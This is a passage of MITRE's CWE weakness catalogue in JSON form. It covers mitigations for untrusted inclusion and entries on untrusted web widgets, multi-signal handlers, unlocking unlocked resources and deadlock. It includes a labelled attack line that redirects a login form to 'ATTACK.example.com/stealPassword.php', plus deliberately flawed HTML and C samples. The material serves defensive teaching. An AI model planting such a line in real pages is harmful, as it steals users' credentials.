Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid."},{"attr":{"@_Mitigation_ID":"MIT-21.1"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":{"xhtml:p":["When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.","For example, ID 1 could map to \\"inbox.txt\\" and ID 2 could map to \\"profile.txt\\". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-34"},"Phase":["Architecture and Design","Operation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server\'s access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.","This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface."]}},{"attr":{"@_Mitigation_ID":"MIT-6"},"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.","Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for cookies and URL components."]}},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-94"},"Intro_Text":"This login webpage includes a weather widget from an external website:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;div class=\\"header\\"&gt; Welcome!&lt;/div&gt;","xhtml:div":{"#text":"&lt;div id=\\"loginBox\\"&gt;Please Login:&lt;/div&gt;&lt;div id=\\"WeatherWidget\\"&gt;&lt;/div&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"&lt;form id =\\"loginForm\\" name=\\"loginForm\\" action=\\"login.php\\" method=\\"post\\"&gt;Username: &lt;input type=\\"text\\" name=\\"username\\" /&gt;&lt;br/&gt;Password: &lt;input type=\\"password\\" name=\\"password\\" /&gt;&lt;input type=\\"submit\\" value=\\"Login\\" /&gt;&lt;/form&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"#text":"&lt;script type=\\"text/javascript\\" src=\\"externalDomain.example.com/weatherwidget.js\\"&gt;&lt;/script&gt;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":{"#text":"document.getElementById(\'loginForm\').action = \\"ATTACK.example.com/stealPassword.php\\";","xhtml:br":["",""],"xhtml:i":"...Weather widget code...."}}],"Body_Text":["This webpage is now only as secure as the external domain it is including functionality from. If an attacker compromised the external domain and could add malicious scripts to the weatherwidget.js file, the attacker would have complete control, as seen in any XSS weakness (CWE-79).","For example, user login information could easily be stolen with a single line added to weatherwidget.js:","This line of javascript changes the login form\'s original action target from the original website to an attack site. As a result, if a user attempts to login their username and password will be sent directly to the attack site."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-2076","Description":"Product does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2076"},{"Reference":"CVE-2004-0285","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0285"},{"Reference":"CVE-2004-0030","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0030"},{"Reference":"CVE-2004-0068","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0068"},{"Reference":"CVE-2005-2157","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2157"},{"Reference":"CVE-2005-2162","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2162"},{"Reference":"CVE-2005-2198","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2198"},{"Reference":"CVE-2004-0128","Description":"Modification of assumed-immutable variable in configuration script leads to file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0128"},{"Reference":"CVE-2005-1864","Description":"PHP file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1864"},{"Reference":"CVE-2005-1869","Description":"PHP file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1869"},{"Reference":"CVE-2005-1870","Description":"PHP file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1870"},{"Reference":"CVE-2005-2154","Description":"PHP local file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2154"},{"Reference":"CVE-2002-1704","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1704"},{"Reference":"CVE-2002-1707","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1707"},{"Reference":"CVE-2005-1964","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1964"},{"Reference":"CVE-2005-1681","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1681"},{"Reference":"CVE-2005-2086","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2086"},{"Reference":"CVE-2004-0127","Description":"Directory traversal vulnerability in PHP include statement.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0127"},{"Reference":"CVE-2005-1971","Description":"Directory traversal vulnerability in PHP include statement.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1971"},{"Reference":"CVE-2005-3335","Description":"PHP file inclusion issue, both remote and local; local include uses \\"..\\" and \\"%00\\" characters as a manipulation, but many remote file inclusion issues probably have this vector.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3335"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"175"}},{"attr":{"@_CAPEC_ID":"201"}},{"attr":{"@_CAPEC_ID":"228"}},{"attr":{"@_CAPEC_ID":"251"}},{"attr":{"@_CAPEC_ID":"252"}},{"attr":{"@_CAPEC_ID":"253"}},{"attr":{"@_CAPEC_ID":"263"}},{"attr":{"@_CAPEC_ID":"549"}},{"attr":{"@_CAPEC_ID":"660"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-76"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-11-29"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"}]}},"830":{"attr":{"@_ID":"830","@_Name":"Inclusion of Web Functionality from an Untrusted Source","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software includes web functionality (such as a web widget) from another domain, which causes it to operate within the domain of the software, potentially granting total access and control of the software to the untrusted source.","Extended_Description":{"xhtml:p":["Including third party functionality in a web-based environment is risky, especially if the source of the functionality is untrusted.","Even if the third party is a trusted source, the software may still be exposed to attacks and malicious behavior if that trusted source is compromised, or if the code is modified in transmission from the third party to the software.","This weakness is common in \\"mashup\\" development on the web, which may include source functionality from other domains. For example, Javascript-based web widgets may be inserted by using \'&lt;SCRIPT SRC=\\"http://other.domain.here\\"&gt;\' tags, which causes the code to run in the domain of the software, not the remote site from which the widget was loaded. As a result, the included code has access to the local DOM, including cookies and other data that the developer might not want the remote site to be able to access.","Such dependencies may be desirable, or even required, but sometimes programmers are not aware that a dependency exists."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"829","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-94"},"Intro_Text":"This login webpage includes a weather widget from an external website:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;div class=\\"header\\"&gt; Welcome!&lt;/div&gt;","xhtml:div":{"#text":"&lt;div id=\\"loginBox\\"&gt;Please Login:&lt;/div&gt;&lt;div id=\\"WeatherWidget\\"&gt;&lt;/div&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"&lt;form id =\\"loginForm\\" name=\\"loginForm\\" action=\\"login.php\\" method=\\"post\\"&gt;Username: &lt;input type=\\"text\\" name=\\"username\\" /&gt;&lt;br/&gt;Password: &lt;input type=\\"password\\" name=\\"password\\" /&gt;&lt;input type=\\"submit\\" value=\\"Login\\" /&gt;&lt;/form&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"#text":"&lt;script type=\\"text/javascript\\" src=\\"externalDomain.example.com/weatherwidget.js\\"&gt;&lt;/script&gt;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":{"#text":"document.getElementById(\'loginForm\').action = \\"ATTACK.example.com/stealPassword.php\\";","xhtml:br":["",""],"xhtml:i":"...Weather widget code...."}}],"Body_Text":["This webpage is now only as secure as the external domain it is including functionality from. If an attacker compromised the external domain and could add malicious scripts to the weatherwidget.js file, the attacker would have complete control, as seen in any XSS weakness (CWE-79).","For example, user login information could easily be stolen with a single line added to weatherwidget.js:","This line of javascript changes the login form\'s original action target from the original website to an attack site. As a result, if a user attempts to login their username and password will be sent directly to the attack site."]}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-778"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-12-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"831":{"attr":{"@_ID":"831","@_Name":"Signal Handler Function Associated with Multiple Signals","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software defines a function that is used as a handler for more than one signal.","Extended_Description":{"xhtml:p":["While sometimes intentional and safe, when the same function is used to handle multiple signals, a race condition could occur if the function uses any state outside of its local declaration, such as global variables or non-reentrant functions, or has any side effects.","An attacker could send one signal that invokes the handler function; in many OSes, this will typically prevent the same signal from invoking the handler again, at least until the handler function has completed execution. However, the attacker could then send a different signal that is associated with the same handler function. This could interrupt the original handler function while it is still executing. If there is shared state, then the state could be corrupted. This can lead to a variety of potential consequences depending on context, including denial of service and code execution.","Another rarely-explored possibility arises when the signal handler is only designed to be executed once (if at all). By sending multiple signals, an attacker could invoke the function more than once. This may generate extra, unintended side effects. A race condition might not even be necessary; the attacker could send one signal, wait until it is handled, then send the other signal."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"364","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity","Confidentiality","Access Control","Other"],"Impact":["DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands","Read Application Data","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Varies by Context"],"Note":"The most common consequence will be a corruption of the state of the software, possibly leading to a crash or exit. However, if the signal handler is operating on state variables for security relevant libraries or protection mechanisms, the consequences can be far more severe, including protection mechanism bypass, privilege escalation, or information exposure."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code registers the same signal handler function with two different signals.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void handler (int sigNum) {}int main (int argc, char* argv[]) {}","xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"signal(SIGUSR1, handler)signal(SIGUSR2, handler)","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-26"},"Intro_Text":"This code registers the same signal handler function with two different signals (CWE-831). If those signals are sent to the process, the handler creates a log message (specified in the first argument to the program) and exits.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *logMessage;void handler (int sigNum) {}int main (int argc, char* argv[]) {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"syslog(LOG_NOTICE, \\"%s\\\\n\\", logMessage);free(logMessage);sleep(10);exit(0);","xhtml:br":["","","","",""],"xhtml:i":"/* artificially increase the size of the timing window to make demonstration of this weakness easier. */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"logMessage = strdup(argv[1]);signal(SIGHUP, handler);signal(SIGTERM, handler);sleep(10);","xhtml:br":["","","","","","",""],"xhtml:i":["/* Register signal handlers. */","/* artificially increase the size of the timing window to make demonstration of this weakness easier. */"]}}]}},"Body_Text":["The handler function uses global state (globalVar and logMessage), and it can be called by both the SIGHUP and SIGTERM signals. An attack scenario might follow these lines:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"The program begins execution, initializes logMessage, and registers the signal handlers for SIGHUP and SIGTERM."},{"xhtml:div":"The program begins its \\"normal\\" functionality, which is simplified as sleep(), but could be any functionality that consumes some time."},{"xhtml:div":"The attacker sends SIGHUP, which invokes handler (call this \\"SIGHUP-handler\\")."},{"xhtml:div":"SIGHUP-handler begins to execute, calling syslog()."},{"xhtml:div":"syslog() calls malloc(), which is non-reentrant. malloc() begins to modify metadata to manage the heap."},{"xhtml:div":"The attacker then sends SIGTERM."},{"xhtml:div":"SIGHUP-handler is interrupted, but syslog\'s malloc call is still executing and has not finished modifying its metadata."},{"xhtml:div":"The SIGTERM handler is invoked."},{"xhtml:div":"SIGTERM-handler records the log message using syslog(), then frees the logMessage variable."}]}},"At this point, the state of the heap is uncertain, because malloc is still modifying the metadata for the heap; the metadata might be in an inconsistent state. The SIGTERM-handler call to free() is assuming that the metadata is inconsistent, possibly causing it to write data to the wrong location while managing the heap. The result is memory corruption, which could lead to a crash or even code execution, depending on the circumstances under which the code is running.","Note that this is an adaptation of a classic example as originally presented by Michal Zalewski [REF-360]; the original example was shown to be exploitable for code execution.","Also note that the strdup(argv[1]) call contains a potential buffer over-read (CWE-126) if the program is called without any arguments, because argc would be 0, and argv[1] would point outside the bounds of the array."]}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-360"}},{"attr":{"@_External_Reference_ID":"REF-361"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-12-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"832":{"attr":{"@_ID":"832","@_Name":"Unlock of a Resource that is not Locked","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software attempts to unlock a resource that is not locked.","Extended_Description":"Depending on the locking functionality, an unlock of a non-locked resource might cause memory corruption or other modification to the resource (or its associated metadata that is used for tracking locks).","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Other"],"Impact":["DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands","Modify Memory","Other"],"Note":"Depending on the locking being used, an unlock operation might not have any adverse effects. When effects exist, the most common consequence will be a corruption of the state of the software, possibly leading to a crash or exit; depending on the implementation of the unlocking, memory corruption or code execution could occur."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-4210","Description":"function in OS kernel unlocks a mutex that was not previously locked, causing a panic or overwrite of arbitrary memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4210"},{"Reference":"CVE-2008-4302","Description":"Chain: OS kernel does not properly handle a failure of a function call (CWE-755), leading to an unlock of a resource that was not locked (CWE-832), with resultant crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4302"},{"Reference":"CVE-2009-1243","Description":"OS kernel performs an unlock in some incorrect circumstances, leading to panic.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1243"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-12-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"833":{"attr":{"@_ID":"833","@_Name":"Deadlock","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains multiple threads or executable segments that are waiting for each other to release a necessary lock, resulting in deadlock.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Other)","DoS: Crash, Exit, or Restart"],"Note":"Each thread of execution will \\"hang\\" and prevent tasks from completing. In some cases, CPU consumption may occur if a lock check occurs in a tight loop."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1476","Description":"A bug in some Intel Pentium processors allow DoS (hang) via an invalid \\"CMPXCHG8B\\" instruction, causing a deadlock","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1476"},{"Reference":"CVE-2009-2857","Description":"OS deadlock","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2857"},{"Reference":"CVE-2009-1961","Description":"OS deadlock involving 3 separate functions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1961"},{"Reference":"CVE-2009-2699","Description":"deadlock in library","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2699"},{"Reference":"CVE-2009-4272","Description":"deadlock triggered by packets that force collisions in a routing table","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4272"},{"Reference":"CVE-2002-1850","Description":"read/write deadlock between web server and script","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1850"},{"Reference":"CVE-2004-0174","Description":"web server deadlock involving multiple listening connections","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0174"},{"Reference":"CVE-2009-1388","Description":"multiple simultaneous calls to the same function trigger deadlock.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1388"},{"Reference":"CVE-2006-5158","Description":"chain: other weakness leads to NULL pointer dereference (CWE-476) or deadlock (CWE-833).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5158"},{"Reference":"CVE-2006-4342","Description":"deadlock when an operation is performed on a resource while it is being removed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4342"},{"Reference":"CVE-2006-2374","Description":"Deadlock in device driver triggered by using file handle of a related device.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2374"},{"Reference":"CVE-2006-2275","Description":"Deadlock when large number of small messages cannot be processed quickly enough.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2275"},{"Reference":"CVE-2005-3847","Description":"OS kernel has deadlock triggered by a signal during a core dump.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3847"},{"Reference":"CVE-2005-3106","Description":"Race condition leads to deadlock.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3106"},{"Reference":"CVE-2005-2456","Description":"Chain: array index error (CWE-129) leads to deadlock (CWE-833)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2456"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding 